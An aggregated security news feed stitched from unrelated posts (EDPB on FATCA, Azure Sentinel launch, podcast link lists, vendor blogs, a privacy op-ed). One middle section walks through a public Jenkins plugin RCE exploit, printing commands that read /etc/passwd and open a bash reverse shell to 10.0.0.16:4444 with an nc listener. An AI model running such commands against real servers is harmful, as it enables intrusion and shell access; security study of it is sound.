On February 25, 2019, the European Data Protection Board (the “EDPB”) issued a statement regarding the transfer of personal data from Europe to the U.S. Internal Revenue Service (the “IRS”) for purposes of the U.S. Foreign Account Tax Compliance Act (“FATCA”).
Enacted in 2010, FATCA requires that foreign financial institutions report information about financial accounts and assets held by their U.S. account holders to the IRS. Such institutions are required to register directly with the IRS to comply with FATCA or comply with intergovernmental agreements signed between the foreign country and the U.S. government. FATCA was designed to combat tax evasion by U.S. persons holding accounts and other financial assets offshore.
The EDPB issued the statement in response to a July 2018 Resolution passed by the European Parliament on the adverse effects of FATCA on EU citizens and in particular “accidental Americans,” and a February 2018 letter addressed to the Article 29 Working Party on behalf of European “accidental Americans.” (The term “accidental American” refers to an individual who by “accident” of birth inherited U.S. citizenship, but who maintains no connection to the U.S. having never lived, worked or studied there, or who does not hold a U.S. Social Security number.) By its Resolution, the European Parliament calls on the EDPB to investigate any infringement of EU data protection rules by EU Member States whose legislation permits the transfer of personal data to the U.S. for purposes of FATCA, and to initiate infringement procedures against Member States that fail to adequately enforce EU data protection rules.
In its statement, the EDPB announced that it will consider Parliament’s request. The EDBP also noted that it is currently preparing guidelines on data transfer tools provided for by the EU General Data Protection Regulation (“GDPR”)—specifically, guidelines discussing transfer tools based on safeguards provided for by Articles 46(2)(a) and 46(3)(b) of the GDPR. The guidelines will also elaborate on the safeguards themselves; they will touch on minimum guarantees to be included in legally binding and enforceable instruments concluded between public authorities and bodies (per Article 46(2)(a)) and provisions to be inserted into administrative arrangements between public authorities or bodies which include enforceable and effective data subject rights (per Article 46(3)(b)).
The guidelines will provide a useful tool for evaluating the FATCA intergovernmental agreements signed between EU Member States and the U.S. government to ensure that they comply with the GDPR.
Threats are constantly evolving and, just like everything else, tend to follow certain trends. Whenever a new type of threat is especially successful or profitable, many others of the same type will inevitably follow. The best defenses need to mirror those trends, so companies get the most robust protection against the newest wave of threats.
Our goal with these reviews is to discover how cutting-edge cybersecurity software fares against the latest threats, hopefully helping you to make good technology purchasing decisions. We'll explain how these new and trending cybersecurity tools work, who they're for, and where they fit into a security architecture.
If you want to hack your way into an old iPhone, you can get hold of a law enforcement-grade system to do just that for a bargain price on eBay.
I think that’s a crime
I can’t stress this enough.
The very existence of tools like these is a threat to every smartphone user. That's because no matter how many times people argue that these solutions will be used only by law enforcement, these things always proliferate.
The fact that Cellebrite systems, which law enforcement was until recently spending heavily on acquiring, are now available on the open market for as little as $100 is a perfect illustration of this.
Cybersecurity is about people. The frontline defenders who stand between the promise of digital transformation and the daily reality of cyber-attacks need our help. At Microsoft, we’ve made it our mission to empower every person and organization on the planet to achieve more. Today that mission is focused on defenders. We are unveiling two new cloud-based technologies in Microsoft Azure Sentinel and Microsoft Threat Experts that empower security operations teams by reducing the noise, false alarms, time consuming tasks and complexity that are weighing them down. Let me start by sharing some insight into the modern defender experience.
Every day Microsoft security professionals help organizations respond to threats at scale and through targeted incident response. In one recent example from the latest Security Intelligence Report, Microsoft experts were called in to help several financial services organizations deal with attacks launched by a state-sponsored group that had gained administrative access and executed fraudulent transactions, transferring large sums of cash into foreign bank accounts. When the attack group realized they had been detected, they rapidly deployed destructive malware that crippled the customers’ operations for several days. Microsoft experts were on site within hours, working around the clock with the customers’ security teams to restore normal business operations.
Incidents like this are a reminder that many defenders are overwhelmed by threats and alerts – often spending their days chasing down false alarms instead of investigating and solving complex cases. Compounding the problem is a critical shortage of skilled cyber defenders, with an estimated shortfall of 3.5 million security professionals by 2021. With today’s announcements we are unlocking the power of the cloud and AI for security to do what they do best—reason over vast amounts of security signal, spot anomalies and bring global scale to highly trained security professionals.
Too many enterprises still rely on traditional Security Information and Event Management (SIEM) tools that are unable to keep pace with the needs of defenders, volume of data or the agility of adversaries. The cloud enables a new class of intelligent security technologies that reduce complexity and integrate with the platforms and productivity tools you depend on. Today we are pleased to announce Microsoft Azure Sentinel, the first native SIEM within a major cloud platform. Azure Sentinel enables you to protect your entire organization by letting you see and stop threats before they cause harm. With AI on your side it helps reduce noise drastically—we have seen an overall reduction of up to 90 percent in alert fatigue with early adopters. Because it’s built on Azure you can take advantage of nearly limitless cloud speed and scale and invest your time in security and not servers. In just a few clicks you can bring in your Microsoft Office 365 data for free and combine it with your other security data for analysis.
Azure Sentinel is the product of Microsoft’s close partnership with customers on their journey to digital transformation. We worked hand in hand with dozens of customers and partners to rearchitect a modern security tool built from the ground up to help defenders do what they do best – solve complex security problems. Early adopters are finding that Azure Sentinel reduces threat hunting from hours to seconds.
Corey McGarry, Senior Technical Specialist, Enterprise Operations, Tolko Industries, Ltd., told me, “After using Microsoft Azure Sentinel for six months, it has become a go-to resource every morning. We get a clear visual of what’s happening across our network without having to check all our systems and dashboards individually. I haven’t seen an offering like Microsoft Azure Sentinel from any other company.”
Azure Sentinel supports open standards such as Common Event Format (CEF) and broad partner connections, including Microsoft Intelligent Security Association partners such as Check Point, Cisco, F5, Fortinet, Palo Alto Networks and Symantec, as well as broader ecosystem partners such as ServiceNow. You can even bring your own insights and collaborate with a diverse community of defenders. Azure Sentinel blends the insights of Microsoft experts and AI with the unique insights and skills of your own in-house defenders and machine learning tools to uncover the most sophisticated attacks before they take root. Azure Sentinel helps empower SecOps teams to keep their organizations safe by harnessing the power, simplicity and extensibility of Azure to analyze data from Microsoft 365 and security solutions from other vendors. Azure Sentinel is available in preview today from the Azure portal.
Our approach to security is not only about applying the cloud and AI to your scale challenges, but also making the security operations experts who defend our cloud available to you. Therefore, we are pleased to announce Microsoft Threat Experts, a new service within Windows Defender ATP which provides managed hunting to extend the capability of your security operations center team. Through this service, Microsoft will proactively hunt over your anonymized security data for the most important threats, such as human adversary intrusions, hands-on-keyboard attacks, and advanced attacks like cyberespionage—helping your team prioritize the most important risks and respond quickly. The service also provides world-class expertise on demand. With the new “Ask a Threat Expert” button, your security operations team can submit questions directly in the product console. To join the public preview of Microsoft Threat Experts, apply in the Windows Defender ATP settings.
There are no easy answers or silver bullets for security, however the cloud is unlocking new capabilities. This is why we are putting the cloud and AI to work to extend and empower the defenders whose unique human insights are key to avoiding cyber threats. Azure Sentinel and Microsoft Threat Experts are two new capabilities that join our broad portfolio of security solutions across identity, endpoints, data, cloud applications and infrastructure. We look forward to showcasing Azure Sentinel and Microsoft Threat Experts at the RSA Conference next week and encourage you to stop by the Microsoft booth on the main show floor or any of our compelling sessions to learn more.
The post Announcing new cloud-based technology to empower cyber defenders appeared first on The Official Microsoft Blog.
Researchers uncovered the flaw in 2016 - but Microsoft still hasn't rolled out patches to protect users of Windows 10
Algorithm equalises power-draw making side-channel attacks harder to execute
Baseboard management controllers give administrators remarkable control over servers inside data centres
Why is Tampa’s mayor tweeting about blowing up the airport? Are hackers trying to connect with you via LinkedIn? And has Maria succeeded in her attempt to survive February without Facebook?
All this and much much more in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.
Plus, after last week’s discussion about the legal battle between Mondelez and Zurich Insurance, we have a chat with security veteran Martin Overton to take a deeper look into cyberinsurance.
On this week’s show Adam and Patrick discuss the week’s security news:
- Cyber Command kicks the IRA off the Internet on election day
- WSJ reporting on Iran vs Australia likely incorrect
- Two Russian cybersecurity professionals sentenced over treason
- DPRK spearphishing US summit participants
- LOTS of technical news and research this week
This week’s show is brought to you by Remediant. Their CEO Tim Keeler will be along in this week’s sponsor segment to talk about how they’re doing “virtual directory binding” to make managing Linux accounts via Active Directory less traumatic. If you’re struggling with horrible, horrible PAM solutions in your devops environments have a listen to that one.
*** NOTE FROM PAT: I made some mistakes in the recording phase of this week’s show. As a result, my vocal audio is pretty atrocious. Sorry! ***
- Cyber Command put the kibosh on Russian trolls during the midterms
- Iranian Group Blamed for Cyberattack on Australia’s Parliament - WSJ
- China, not Iran, still the main suspect in hacking of Australia's political parties, say sources
- Former Russian Cybersecurity Chief Sentenced to 22 Years in Prison — Krebs on Security
- North Korean hackers go on phishing expedition before Trump-Kim summit
- Supermicro hardware weaknesses let researchers backdoor an IBM cloud server | Ars Technica
- The Missing Security Primer for Bare Metal Cloud Services – Eclypsium
- The secret lives of Facebook moderators in America - The Verge
- CRXcavator: Democratizing Chrome Extension Security | Duo Security
- Toyota Australia says no customer data taken in attempted cyber attack | Business | The Guardian
- Toyota Australia hack update | Automotive Industry News | just-auto
- Many websites threatened by highly critical code-execution bug in Drupal | Ars Technica
- It took hackers only three days to start exploiting latest Drupal bug | ZDNet
- Former Hacking Team Members Are Now Spying on the Blockchain for Coinbase - Motherboard
- For many crooks, malware is out and PowerShell attacks are in, IBM says
- New flaws in 4G, 5G allow attackers to intercept calls and track phone locations | TechCrunch
- Cryptocurrency wallet caught sending user passwords to Google's spellchecker | ZDNet
- POS firm says hackers planted malware on customer networks | ZDNet
- Surveillance firm asks Mozilla to be included in Firefox's certificate whitelist | ZDNet
- New browser attack lets hackers run bad code even after users leave a web page | ZDNet
- WinRAR versions released in the last 19 years impacted by severe security flaw | ZDNet
- Dow Jones’ watchlist of 2.4 million high-risk clients has leaked | TechCrunch
- Intel open-sources HBFA app to help with firmware security testing | ZDNet
- Thunderclap flaws impact how Windows, Mac, Linux handle Thunderbolt peripherals | ZDNet
- Spain investigates raid on North Korean embassy: sources | Reuters
- Conference | 0xCC | Melbourne
A vulnerability in the update service of Cisco Webex Meetings Desktop App and Cisco Webex Productivity Tools for Windows could allow an authenticated, local attacker to execute arbitrary commands as a privileged user.
The vulnerability is due to insufficient validation of user-supplied parameters. An attacker could exploit this vulnerability by invoking the update service command with a crafted argument. An exploit could allow the attacker to run arbitrary commands with SYSTEM user privileges.
While the CVSS Attack Vector metric denotes the requirement for an attacker to have local access, administrators should be aware that in Active Directory deployments, the vulnerability could be exploited remotely by leveraging the operating system remote management tools.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
This advisory is available at the following link:
Security Impact Rating: High
While not totally related to the blog post and tweet the following exploit came up while searching.
What I have figured out that is important is the plug versions as it relates to these latest round of Jenkins exploits. TBH I never paid much attention to the plugins in the past as the issues have been with core Jenkins (as was the first blog post) but you can get a look at them by going to jenkins-server/pluginManager/installed
|Jenkins plugin manager|
|No permissions for Jenkins plugin manager|
AFAIK you cant enumerate plugins installed and their version without (elevated) authentication like you can with things like WordPress. If you know how, please let me know. For the time being i guess it's just throwing things to see what sticks.
As I mentioned, the latest particular vulns are issues with installed Jenkins plugins. Taking a look at CVE-2019-1003000 (https://nvd.nist.gov/vuln/detail/CVE-2019-1003000) we can see that it affects the Script Security Plugin (the nist.gov says 2.49 but it's a typo and should be 1.49) as seen on the Jenkins advisory https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
An exploit for the issue exists and is available here: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc it even comes with a docker config to spin up a vulnerable version to try it out on. What's important about this particular exploit is that it IS post auth but it doesn't require script permissions, only Overall/Read permission and Job/Configure permissions.
I'm seeing more and more servers/admins (rightfully) block access to the script & scriptText console because it's well documented that is an immediate RCE.
|no script permission|
A flaw was found in Pipeline: Declarative Plugin before version 220.127.116.11, Pipeline: Groovy Plugin before version 2.61.1 and Script Security Plugin before version 1.50
This PoC is using a user with Overall/Read and Job/Configure permission to execute a maliciously modified build script in sandbox mode, and try to bypass the sandbox mode limitation in order to run arbitrary scripts (in this case, we will execute system command).
As a background, Jenkins's pipeline build script is written in groovy. This build script will be compiled and executed in Jenkins master or node, containing definition of the pipeline, e.g. what to do in slave nodes. Jenkins also provide the script to be executed in sandbox mode. In sandbox mode, all dangerous functions are blacklisted, so regular user cannot do anything malicious to the Jenkins server.
Running the exploit:
python2.7 exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "cat /etc/passwd"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
[Pipeline] End of Pipeline
you can certainly pull a reverse shell from it as well.
python2.7 exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "bash -i >& /dev/tcp/10.0.0.16/4444 0>&1"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY
and you get:
nc -l 4444 -vv
bash: cannot set terminal process group (7): Not a tty
bash: no job control in this shell
The TLDR is you can use this exploit to get a shell if an older version of the Script Security Plugin is installed and if you have Overall/Read permission and Job/Configure permission which a regular Jenkins user is more inclined to have and this exploit doesn't require using the script console.
Veracode Software Composition Analysis now also scans Docker containers and images to find vulnerabilities associated with open source libraries as dependencies of the base OS image and globally installed packages. If you’re interested in understanding how containers work, the different components that make up your container ecosystem, and how that differs from virtualization, we recommend this great overview by Docker.
Do containers introduce new risks?
Containers can introduce new risks to your application due to the installation of a base OS image that you may not have used without the container, but they can also give you greater access and knowledge earlier in the development process. The image itself will often depend on numerous open source libraries that can introduce new vulnerabilities to your application. In addition, containers allow you to install packages at the global level, which previously may not have been accessible to vulnerability scans. It’s also not uncommon for developers to build applications in different environments than what is in production, meaning any vulnerability scans in development may not mirror what is in production. By containerizing applications, developers are able to build in the same environment as the final production platform, allowing them to conduct vulnerability scans on a production-ready image.
Simply using containers isn’t the security risk – it’s not knowing which open source libraries are installed and the vulnerabilities they may present.
How does Veracode secure containers?
Securing your container infrastructure is a huge undertaking that isn’t always clearly defined. Every layer of the container infrastructure can introduce risks, including the hardware, host OS, kernel, Docker engine, registry, base OS image, globally installed packages, and the application. Look to your existing set of vendors and solutions to address each one of them in the same way that you’re addressing OS vulnerabilities on the rest of the network.
As an application security company, Veracode is focused on the application, the base OS image, and the globally installed packages.
Securing containers from open source vulnerabilities isn’t all that different from looking at vulnerabilities in open source libraries in your code. You need to be able to scan your container the moment it’s introduced, with all of its globally installed packages. This enables your development team to decide whether they want to proceed forward with the vulnerabilities present, introduce ways to mitigate the issues, update to a more secure version of the libraries being used, or explore alternative base images and libraries that are more secure.
Divide and conquer: vulnerabilities in application code vs. base OS image
To limit complexity, and to avoid waiting for all applications to be “Dockerized,” Veracode recommends that you divide and conquer the security of the application itself and the security of the container and its dependencies:
- Scan your code before you package it up in a container – fix all of the third-party vulnerabilities, and the flaws found in your first-party code.
- Once your application/code is in a state that is acceptable for production, containerize the application in your pipeline, and then run an open source security scan against the container itself.
Veracode Software Composition Analysis finds vulnerabilities in the base OS image and runtime dependencies
Veracode Software Composition Analysis now looks for vulnerabilities associated with open source libraries as dependencies of the base OS image (CentOS/RHEL) and any packages globally installed with the YUM package manager in a Docker container.
Containers are scanned automatically via an agent in the developer’s CI system, or manually in a developer’s CLI. You can scan your application prior to the containerization and the container itself separately. This provides a clear inventory of all of the dependencies and associated vulnerabilities before pushing it to production.
Finally, Veracode Software Composition Analysis keeps a history of what’s in the container and alerts you to new vulnerabilities, removing the requirement of rescanning the container unless you change its dependencies.
To learn more about open source libraries, and direct vs. indirect dependencies, read the Understanding Your Open Source Risk ebook.
Researchers discovered new Trojan malware written in Golang that’s targeting e-commerce websites with brute-force attacks.
In their investigation, Malwarebytes researchers found a connection between the compromised e-commerce website and a two-stage payload. The first stage consisted of a Delphi downloader detected as Trojan.Wallyshack. This threat collected basic information about the infected machine, transmitted the data to its command-and-control (C&C) server and ran Trojan.StealthWorker.GO, the second payload that communicated with the infected site. Written in Golang version 1.9, this malware sample contained several functions with the name “Brut” that it used for brute-forcing.
Connections to MageCart and the Rise of Golang Threats
While analyzing the infected website, Malwarebytes observed how this wasn’t the first time that googletagmanager[.]eu has surfaced in an attack campaign. In fact, researchers traced the domain back to criminal activities involving MageCart. This threat actor has affected more than 800 organizations by compromising their e-commerce websites and stealing customers’ payment card details, as noted by RiskIQ.
At the same time, this brute-forcer comes amid a rise of Golang-based digital threats. In January 2019, for example, Malwarebytes Labs detected Trojan.CryptoStealer.Go, an information stealer written in this budding programming language. Just a month before, researchers at Palo Alto Networks’ Unit 42 came across a Golang variant of Zebrocy, an attack tool used by the Sofacy threat group.
How Security Teams Can Defend Against Brute-Forcers
Security professionals can help defend against brute-force attacks by shielding their network perimeter against outside intrusion with firewalls and identity-based security such as identity and access management (IAM). Additionally, security teams should implement consistent software patching so they can close off known vulnerabilities.
The post New Golang Brute-Forcer Targeting E-Commerce Sites to Steal Personal and Payment Data appeared first on Security Intelligence.
Security researchers discovered that a threat actor is targeting LinkedIn users with fake job offers to deliver the More_eggs backdoor.
Since mid-2018, Proofpoint has observed various campaigns distributing More_eggs, each of which began with a threat actor creating a fraudulent LinkedIn profile. The attacker used these accounts to contact targeted employees at U.S. companies — primarily in retail, entertainment, pharmaceuticals and other industries that commonly employ online payments — with a fake job offer via LinkedIn messaging.
A week after sending these messages, the attacker contacted the targeted employees directly using their work email to remind them of their LinkedIn correspondence. This threat actor incorporated the targets’ professional titles into subject lines and sometimes asked recipients to click on a link to a job description. Other times, the message contained a fake PDF with embedded links.
These URLs all pointed to a landing page that spoofed a legitimate talent and staffing management company. There, the target received a prompt to download a Microsoft Word document that downloaded the More_eggs backdoor once macros were enabled. Written in JScript, this backdoor malware is capable of downloading additional payloads and profiling infected machines.
A Series of Malicious Activities on LinkedIn
The threat actor responsible for these campaigns appears to have had a busy 2019 so far. Proofpoint found ties between these operations and a campaign first disclosed by Krebs on Security in which phishers targeted anti-money laundering officers at U.S. credit unions. Specifically, the security firm observed similar PDF email attachments and URLs all hosted on the same domain.
This isn’t the first time an online actor has used LinkedIn for malicious activity, either. Back in September 2017, Malwarebytes Labs found evidence of attackers compromising peoples’ LinkedIn accounts and using them to distribute phishing links via private messages. Less than a year later, Alex Hartman of Network Solutions, Inc. disclosed a similar campaign in which threat actors attempted to spread malware via LinkedIn using fake business propositions.
How to Defend Against Backdoors Like More_eggs
Security professionals can help defend against backdoors like More_eggs by consistently monitoring endpoints and devices for suspicious activity. Security teams should simultaneously use real-time compliance rules to automate remediation in the event they observe behavior that appears to be malicious.
Additionally, experts recommend testing the organization’s phishing defenses by contacting a reputable penetration testing service that employs the same tactics, techniques and procedures (TTPs) as digital criminals.
The post Threat Actor Using Fake LinkedIn Job Offers to Deliver More_eggs Backdoor appeared first on Security Intelligence.
When it comes to breaches, we have seen this time and again: an exploited vulnerability that costs organizations millions of dollars, and consumers their private data. Zero-Day vulnerabilities are software flaws or bugs that are unknown to the software developers, and don’t yet have a patch, providing a perfect opportunity for an enterprising hacker to create an “exploit”–a type of malware specifically targeting these software vulnerabilities– costing organizations millions of dollars, and consumers their private data.
In fact, nearly 60% of organizations have cited they’ve been breached due to an unpatched vulnerability. Whether a lone wolf or a nation-state takes advantage of these vulnerabilities, the results could be catastrophic.
Vulnerabilities and Threat Actors
Data breaches caused by zero- one-day vulnerabilities are likely ones that have already affected your organization. In 2017, Equifax revealed that a breach had implicated Personally Identifiable Information (PII) of 148 million Americans. The cause of the breach? Out-of-date software that went unnoticed for 76 days. All it takes is for one bad actor to find these vulnerabilities.
One of the earliest examples of a zero-day vulnerability is a worm that infected Iranian nuclear plants. The worm slowed down the centrifuges in the plants, shutting them down completely. Upon investigation, it was found that only a nation-state could be capable of such a large scale attack with such dire consequences. Vulnerabilities and exploits like these attack every industry vertical, leaving no enterprise safe. Understanding whether your organization is targeted in these types of attacks is crucial.
One lone-wolf actor, Luxor2008, was discovered selling one-day software exploits on Russian Dark Web forums. A reputable seller of dangerous malwares, Luxor2008’s malware was being sold to other criminals at a price-point of 10,000 USD. The specific malware exploit, CVE-2018-8453, enables the user to bypass the Supervisor Mode Access Prevention, and is undetected by security solutions like Kaspersky Total Security 2019. The nature of this exploit could cause serious damage, and because this actor only sells on one marketplace, it is difficult for law enforcement to catch.
The Seemingly Simple Fix
These vulnerabilities are often easily fixed by patching and updating regularly; you know this, of course. It’s part of the Cybersecurity ABCs. So why don’t more organizations patch and update regularly? Many organizations wait to patch these software issues to make sure they won’t affect anything else on their systems. Often, end-point users of enterprise computer systems are not in control of patching and updating their computers—their IT department is. Updating systems may cause a void to the system warranty or licensing terms, causing a delay in patching. However, this leaves the attack window open for a threat actor to take advantage of the vulnerability. The key to defending against these vulnerabilities? Anticipating the attacks before they occur with a tailored threat model.
When assessing your organization’s patch management cycle, it is necessary for your security experts to prioritize the deployment of patches and updates. With different patches posing distinct challenges, understanding the motives behind threats as well as the relevancy of the threat to your organization is paramount to your security.
It’s not enough to just know about threat actors and unpatched vulnerabilities. Organizations need these vulnerabilities to be put into the context of their organization’s security. From there, they can understand if a) they are a certain threat actor’s target and b) if yes, do they have sufficient security relating to that actor’s specific TTPs. Otherwise, that threat will likely be of high relevance to your organization. This is where risk scoring, gap analysis, and threat modeling become highly valuable to your security analysts.
Using a platform where you can create a tailored model of an adversary, then score that threat based on relevance helps analysts to pinpoint exactly the highest priority issues and where there are gaps in the organization’s security posture. LookingGlass’ ScoutThreat platform allows your analysts to do just that – create robust and tailored threat models, score those threats, and then perform gap analysis. Organizations can no longer afford to have a defensive strategy — learn more about LookingGlass ScoutThreat here.
The post Zero-Day Vulnerabilities: An Inside Look at Luxor2008 appeared first on LookingGlass Cyber Solutions Inc..
WANT A LARGE tasty plate of big data? For restaurants all over the world, the answer is yes, and they get it from Venga, a fast-paced start-up based in the trendy Union Market district of Washington, D.C. Founded in 2010, Venga provides businesses in the restaurant and fitness industries the ability to collect, track and analyze guest’s spending and visiting habits to create personalized experiences and repeat visits. Verisign sat down with co-founder, Winston Lord, to learn more:
Q: The idea of personalizing a guest’s experience, especially with dining, is so smart. How did the concept for Venga come about?
A: The idea came to me and Venga co-founder, Sam Pollaro, about 17 years ago, during the advent of the daily deals sites, such as Groupon and LivingSocial. As you know, these deals were very advantageous to the diner, but we recognized there was an opportunity to help restaurants take control of their own marketing and better connect with their diners. So, we provided them with a platform where they could upload any kind of marketing offer, such as happy hour, fresh catch of the day or a discount.
Q: How has Venga evolved over the years?
A: Venga 1.0 was sort of a marketing tool that allowed restaurants to connect with guests directly through their social media channels and websites, in addition to an app that we developed. Then in 2013, a celebrity chef – one of the first adopters of that app – challenged us to help him find a better way to understand his customers and existing diners because quite frankly, retaining a guest is a lot more inexpensive than acquiring a new one.
So, over the next several years, we built out a suite of tools, using well known online reservation tools and point-of-sale integration, that really connected the dots between guests and their purchases. Today, it means restaurants and fitness studios are able to track and analyze their customers’ purchases, habits and preferences to personalize the guest experience, power targeted marketing and build true loyalty.
Q: Your domain name, GetVenga.com, is very catchy. How did you choose it for your online presence?
A: When you’re looking at domain names, you want what’s easily memorable, but also connotes what your company does. In Italian and Spanish, Venga means “come join us.” Obviously in restaurant-speak, it’s all about having a great time and feeling like a family.
We went for GetVenga.com because we wanted people to “get Venga.” We could’ve gotten another extension, but ultimately, we wanted to find a dot com because that connotes trust and established companies. For us, it wasn’t even a close call.
Q: Tell us about Venga’s online presence in the beginning and how it’s evolved.
A: If you were to go back in a time machine and compare our website then and now, you’d be amazed! Basically, it was just me and Sam trying to put together a website. Over the years, we’ve brought on a great team who’ve redesigned it to create a compelling site, with information about our products, case studies from great brands, and a blog focused on thought leadership.
Our domain name presence is truly the critical lifeblood to our business. And for us, the key to our website is to keep it engaging. It’s the best way to reach potential customers and a great way for anyone to get a real understanding of who we are…where people can go and see a true reflection of us as a company.
Q: What do you hope your website provides you in the future?
A: We often ask ourselves “are we only staying in hospitality and fitness? Or are we looking to expand into other industries?”
Right now, we have two products going to one website. But as we continue to grow and develop more features, there’s a good possibility that we may register other domain names and create microsites. And when that opportunity comes, I can tell you right now that we’re going to consistently stay with dot com. It just connotes maturity and trustworthiness.
Q: Any advice you would give to a startup company?
A: Three things. First, when you’re building your website, show the value proposition of what you’re doing to your audience with a side of fun. You don’t want to come off as immature, but you shouldn’t be afraid to show a little personality. Secondly, take time to research the great, new interactive features that will make your website feel more advanced. It goes a long way. And thirdly, get a dot com.
Subscribe to the Verisign blog to have future posts delivered directly to your inbox.
The post Tech Company Takes “Dine and Dash” to a Whole New Level appeared first on Verisign Blog.
Privacy is a human right, and online privacy should be no exception.
Yet, as the US considers new laws to protect individuals’ online data, at least two proposals—one statewide law that can still be amended and one federal draft bill that has yet to be introduced—include an unwelcome bargain: exchanging money for privacy.
This framework, sometimes called “pay-for-privacy,” is plain wrong. It casts privacy as a commodity that individuals with the means can easily purchase. But a move in this direction could further deepen the separation between socioeconomic classes. The “haves” can operate online free from prying eyes. But the “have nots” must forfeit that right.
Though this framework has been used by at least one major telecommunications company before, and there are no laws preventing its practice today, those in cybersecurity and the broader technology industry must put a stop to it. Before pay-for-privacy becomes law, privacy as a right should become industry practice.
Data privacy laws prove popular, but flawed
Last year, the European Union put into effect one of the most sweeping set of data privacy laws in the world. The General Data Protection Regulation, or GDPR, regulates how companies collect, store, share, and use EU citizens’ data. The law has inspired countries everywhere to follow suit, with Italy (an EU member) issuing regulatory fines against Facebook, Brazil passing a new data-protective bill, and Chile amending its constitution to include data protection rights.
The US is no exception to this ripple effect.
In the past year, Senators Ron Wyden of Oregon, Marco Rubio of Florida, Amy Klobuchar of Minnesota, and Brian Schatz, joined by 14 other senators as co-sponsors, of Hawaii, proposed separate federal bills to regulate how companies collect, use, and protect Americans’ data.
Sen. Rubio’s bill asks the Federal Trade Commission to write its own set of rules, which Congress would then vote on two years later. Sen. Klobuchar’s bill would require companies to write clear terms of service agreements and to send users notifications about privacy violations within 72 hours. Sen. Schatz’s bill introduces the idea that companies have a “duty to care” for consumers’ data by providing a “reasonable” level of security.
But it is Sen. Wyden’s bill, the Consumer Data Protection Act, that stands out, and not for good reason. Hidden among several privacy-forward provisions, like stronger enforcement authority for the FTC and mandatory privacy reports for companies of a certain size, is a dangerous pay-for-privacy stipulation.
According to the Consumer Data Protection Act, companies that require user consent for their services could charge users a fee if those users have opted out of online tracking.
If passed, here’s how the Consumer Data Protection Act would work:
Say a user, Alice, no longer feels comfortable having companies collect, share, and sell her personal information to third parties for the purpose of targeted ads and increased corporate revenue. First, Alice would register with the Federal Trade Commission’s “Do Not Track” website, where she would choose to opt-out of online tracking. Then, online companies with which Alice interacts would be required to check Alice’s “Do Not Track” status.
If a company sees that Alice has opted out of online tracking, that company is barred from sharing her information with third parties and from following her online to build and sell a profile of her Internet activity. Companies that are run almost entirely on user data—including Facebook, Amazon, Google, Uber, Fitbit, Spotify, and Tinder—would need to heed users’ individual decisions. However, those same companies could present Alice with a difficult choice: She can continue to use their services, free of online tracking, so long as she pays a price.
This represents a literal price for privacy.
Electronic Frontier Foundation Senior Staff Attorney Adam Schwartz said his organization strongly opposes pay-for-privacy systems.
“People should be able to not just opt out, but not be opted in, to corporate surveillance,” Schwartz said. “Also, when they choose to maintain their privacy, they shouldn’t have to pay a higher price.”
Pay-for-privacy schemes can come in two varieties: individuals can be asked to pay more for more privacy, or they can pay a lower (discounted) amount and be given less privacy. Both options, Schwartz said, incentivize people not to exercise their privacy rights, either because the cost is too high or because the monetary gain is too appealing.
Both options also harm low-income communities, Schwartz said.
“Poor people are more likely to be coerced into giving up their privacy because they need the money,” Schwartz said. “We could be heading into a world of the ‘privacy-haves’ and ‘have-nots’ that conforms to current economic statuses. It’s hard enough for low-income individuals to live in California with its high cost-of-living. This would only further aggravate the quality of life.”
Unfortunately, a pay-for-privacy provision is also included in the California Consumer Privacy Act, which the state passed last year. Though the law includes a “non-discrimination” clause meant to prevent just this type of practice, it also includes an exemption that allows companies to provide users with “incentives” to still collect and sell personal information.
In a larger blog about ways to improve the law, which was then a bill, Schwartz and other EFF attorneys wrote:
“For example, if a service costs money, and a user of this service refuses to consent to collection and sale of their data, then the service may charge them more than it charges users that do consent.”
The alarm for pay-for-privacy isn’t theoretical—it has been implemented in the past, and there is no law stopping companies from doing it again.
In 2015, AT&T offered broadband service for a $30-a-month discount if users agreed to have their Internet activity tracked. According to AT&T’s own words, that Internet activity included the “webpages you visit, the time you spend on each, the links or ads you see and follow, and the search terms you enter.”
Most of the time, paying for privacy isn’t always so obvious, with real dollars coming out or going into a user’s wallet or checking account. Instead, it happens behind the scenes, and it isn’t the user getting richer—it’s the companies.
Powered by mountains of user data for targeted ads, Google-parent Alphabet recorded $32.6 billion in advertising revenue in the last quarter of 2018 alone. In the same quarter, Twitter recorded $791 million in ad revenue. And, notable for its CEO’s insistence that the company does not sell user data, Facebook’s prior plans to do just that were revealed in documents posted this week. Signing up for these services may be “free,” but that’s only because the product isn’t the platform—it’s the user.
A handful of companies currently reject this approach, though, refusing to sell or monetize users’ private information.
As for Google’s very first product—online search— the clearest privacy alternative is DuckDuckGo. The privacy-focused service does not track users’ searches, and it does not build individualized profiles of its users to deliver unique results.
Even without monetizing users’ data, DuckDuckGo has been profitable since 2014, said community manager Daniel Davis.
“At DuckDuckGo, we’ve been able to do this with ads based on context (individual search queries) rather than personalization.”
Davis said that DuckDuckGo’s decisions are steered by a long-held belief that privacy is a fundamental right. “When it comes to the online world,” Davis said, “things should be no different, and privacy by default should be the norm.”
It is time other companies follow suit, Davis said.
“Control of one’s own data should not come at a price, so it’s essential that [the] industry works harder to develop business models that don’t make privacy a luxury,” Davis said. “We’re proof this is possible.”
Hopefully, other companies are listening, because it shouldn’t matter whether pay-for-privacy is codified into law—it should never be accepted as an industry practice.
Are you still breakdancing? Storing data on your floppy disk? Performing your searches through the card catalog? Assuming the answer is no, then why are you still using an on-premises application security solution?
In all seriousness, take a look at the benefits, and cost savings, you would see with a cloud-based AppSec solution:
Start scanning immediately: No need to install servers and tools, no need to hire consultants or security specialists to get up and running. On-premises solutions require significant upfront implementation and equipment costs. In addition, on-premises solutions typically require specialized experts to install and run. The security experts who can install, configure, and maintain these tools, as well as respond to the information they return, are expensive and in short supply.
